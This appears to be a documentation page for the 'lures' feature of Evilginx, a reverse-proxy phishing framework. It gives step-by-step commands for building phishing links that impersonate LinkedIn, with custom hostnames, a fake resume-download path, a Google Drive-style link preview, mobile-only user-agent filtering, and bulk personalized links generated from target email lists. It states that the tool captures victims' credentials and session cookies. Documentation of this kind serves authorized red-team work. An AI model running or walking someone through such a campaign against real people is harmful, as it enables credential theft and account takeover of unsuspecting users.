Lures

Lures are essentially pre-generated phishing links, which you will be sending out on your engagements. Evilginx provides multiple options to customize your lures.

Create

A lure has to be assigned to a specific phishlet. For example to create a lure for linkedin phishlet, you can do:

: lures create linkedin

The lure you create will automatically get an ID assigned. Let's assume the ID of your new lure is 0. You can always check the list of your lures with:

: lures

Customize

By default, lure URL will come with a randomly generated path, hostname being the one you set up for the phishlet and subdomain which is defined in the phishlet with is_landing: true.

Your default lure URL should look like this:

: lures get-url 0

https://www.linkedin.not-a-phish.com/PlXFBIrM

You can already take this URL and send it out, but you will miss out on a lot of customizations you can introduce to make the lures look better.

Pause

You can pause a lure for a fixed time duration if you want the lure URL to redirect the visitor to unauth_url, you set up globally or for specific phishlet, until the timer expires.

The time duration must be enetered in 1d2h3m4s format.

If you want to pause a lure for 1 day and 12 hours:

: lures pause 0 1d12h

If you want to pause a lure for 5 minutes:

: lures pause 0 5m

If you want to pause a lure for 1 minute and 30 seconds:

: lures pause 0 1m30s

Unpause

Every paused lure can be unpaused at any time:

: lures unpause 0

Hostname

If you're not satisfied with the hostname, which was automatically generated, you can pick any hostname for your lure, under condition that it ends with the top-level domain you set up for your Evilginx installation.

To change hostname for your lure:

: lures edit 0 hostname this.is.a.legit.linkedin.not-a-phish.com

Setting up a custom hostname for a lure will also trigger an automatic retrieval of TLS certificates.

Path

You can also entirely change the path of your phishing landing page for selected lure.

: lures edit 0 path /downloads/RESUME.pdf

Redirector

Redirectors are little websites, which act as a landing page for your phishing links. Selected redirector will be shown to the visitor when the lure URL is opened. Their sole purpose is to redirect the user to the phishing login page, either automatically or requiring user interaction. You can customize your redirectors with custom variables embedded in their HTML files. like {variable_name}. Values for these variables can be automatically filled in through the generation of lure URLs, using lures get-url.

To set a specific redirector for your lure do:

: lures edit 0 redirector download_example

Learn how to generate URLs with custom values for redirector variables here

User-Agent filter

This option specifies a regular expression, which has to match the User-Agent HTTP header of the incoming requests to be accepted. Unauthorized requests will be redirected the same way as requests to invalid lure URLs.

You can use this to filter out desktop or mobile clients, if you only want to cover a specific target group.

: lures edit 0 ua_filter Mobile|Android|BlackBerry

Redirect URL

When the phished user successfully enters their credentials and Evilginx manages to capture them, together with the session cookies, they will be redirected to the URL defined under this option.

If this option is empty, Evilginx will try it's best to continue performing reverse-proxying for logged in users.

: lures edit 0 redirect_url https://drive.google.com/shared/document/0019234/preview

OpenGraph

OpenGraph is the current standard for meta tags to generate previews of website content when sharing links on messengers or social media. Evilginx fully supports customization of the previews for your phishing links. It will inject the set up meta tags into both your redirectors and reverse proxied sign-in pages.

: lures edit 0 og_title "Download RESUME.pdf"
: lures edit 0 og_desc "Download your file securely - click to preview"
: lures edit 0 og_image https://breakdev.org/content/images/2020/09/evilginx_gone_phishing_blog.jpg
: lures edit 0 og_url https://drive.google.com/shared/document/0019234/preview

Here is a quick overview of all the options:

Option	Description	Example
`og_title`	Title (up to 60 characters)	Evilginx 2.4 - Gone Phishing
`og_desc`	Description (up to 160 characters)	"Gone Phishing" 2.4 update to your favorite phishing framework is here. May the phishing season begin!
`og_image`	Preview image URL (recommended 1200 x 630)	https://breakdev.org/content/images/2020/09/evilginx_gone_phishing_blog.jpg
`og_url`	URL visible on the preview	https://breakdev.org/evilginx-2-4-gone-phishing/

Information (Notes)

You can also set up some private notes for your lure:

lures edit 0 info "This is a test lure - do not use on engagements"

Generate URL

When you're done customizing your lure, you can start generating your phishing links, which you'll be sending out in your engagement.

Single

If your lure is not using custom variables through a redirector or js_inject section in your phishlet, you can generate a link simply like this:

: lures get-url 0

If your phishing campaign supports personalized redirectors, together with ability to pre-fill some sign-in form data, allowed by the phishlet you're using, you can specify custom variables while generating phishing links.

Let's say your redirector and/or js_inject script makes use of your target email and name:

lures get-url 0 email=john.doe@company.com name="John Doe"

info

You can escape " characters with \".

The values for defined custom variables will be encrypted into a single GET parameter for the link. The parameter name is always randomly generated and the encrypted value is always unique, even when using the same values multiple times. This ensures that GET parameters cannot be fingerprinted later on as they never provide a static signature.

Multiple

Understandably, your engagements will require generation of dozens if not hundreds of personalized phishing links for your engagement. Evilginx thankfully provides a way to generate the links in bulk, all at once.

You can provide an input file with your custom variables in csv or json format.

This is an example csv input file. The first row specifies the variable names as column names and the rows below contain just the values:

email,name
john.doe@company.com,John Doe
elle@company.com,Elle
steven@company.com,Steven

The same input file in json format would like the following:

[{
    "email":"john.doe@company.com",
    "name":"John Doe"
},{
    "email":"elle@company.com",
    "name":"Elle"
},{
    "email":"steven@company.com",
    "name":"Steven"
}]

To import the custom variables form an input file and output the generated links in the terminal, do it like this:

: lures get-url 0 import input.csv

: lures get-url 0 import input.json

It may be more convenient to export the generated links to a file, which is also possible:

: lures get-url 0 import input.csv export targets.txt

Exported output will also include original values as comments, so that you know which link contains what parameters:

https://www.linkedin.not-a-phish.com/download/RESUME.pdf?h=WYofPy3LHfWukWZvz55jLf8LNJ_ys0-IMGLxtn246RXGIE2Ep8q1kijrEoO5QkN0Gg ; email="john.doe@company.com" name="John Doe"
https://www.linkedin.not-a-phish.com/download/RESUME.pdf?jck=CFSmJJcaWrS--tPAGJbbM5mGdc4wJ_dDtf0GoVYeH3u33q43LExgnG0 ; email="elle@company.com" name="Elle"
https://www.linkedin.not-a-phish.com/download/RESUME.pdf?t=YTvVbl6ZQHMUKBbF88TRrv_gkSA8tdVV0USJTt5EjWDDlArmGvnaA2amm9l7 ; email="steven@company.com" name="Steven"

Commands

: help lures

 lures

 Shows all create lures and allows to edit or delete them.

 lures
   show all create lures
 lures <id>
   show details of a lure with a given <id>
 lures create <phishlet>
   creates new lure for given <phishlet>
 lures delete <id>
   deletes lure with given <id>
 lures delete all
   deletes all created lures
 lures get-url <id> <key1=value1> <key2=value2>
   generates a phishing url for a lure with a given <id>, with optional parameters
 lures get-url <id> import <params_file> export <urls_file> <text|csv|json>
   generates phishing urls, importing parameters from <import_path> file and exporting them to <export_path>
 lures edit <id> hostname <hostname>
   sets custom phishing <hostname> for a lure with a given <id>
 lures edit <id> path <path>
   sets custom url <path> for a lure with a given <id>
 lures edit <id> redirector <path>
   sets an html redirector directory <path> for a lure with a given <id>
 lures edit <id> ua_filter <regexp>
   sets a regular expression user-agent whitelist filter <regexp> for a lure with a given <id>
 lures edit <id> redirect_url <redirect_url>
   sets redirect url that user will be navigated to on successful authorization, for a lure with a given <id>
 lures edit <id> phishlet <phishlet>
   change the phishlet, the lure with a given <id> applies to
 lures edit <id> info <info>
   set personal information to describe a lure with a given <id> (display only)
 lures edit <id> og_title <title>
   sets opengraph title that will be shown in link preview, for a lure with a given <id>
 lures edit <id> og_des <title>
   sets opengraph description that will be shown in link preview, for a lure with a given <id>
 lures edit <id> og_image <title>
   sets opengraph image url that will be shown in link preview, for a lure with a given <id>
 lures edit <id> og_url <title>
   sets opengraph url that will be shown in link preview, for a lure with a given <id>

Lures

Create​

Customize​

Pause​

Unpause​

Hostname​

Path​

Redirector​

User-Agent filter​

Redirect URL​

OpenGraph​

Information (Notes)​

Generate URL​

Single​

info

Multiple​

Commands​

Create

Customize

Pause

Unpause

Hostname

Path

Redirector

User-Agent filter

Redirect URL

OpenGraph

Information (Notes)

Generate URL

Single

Multiple

Commands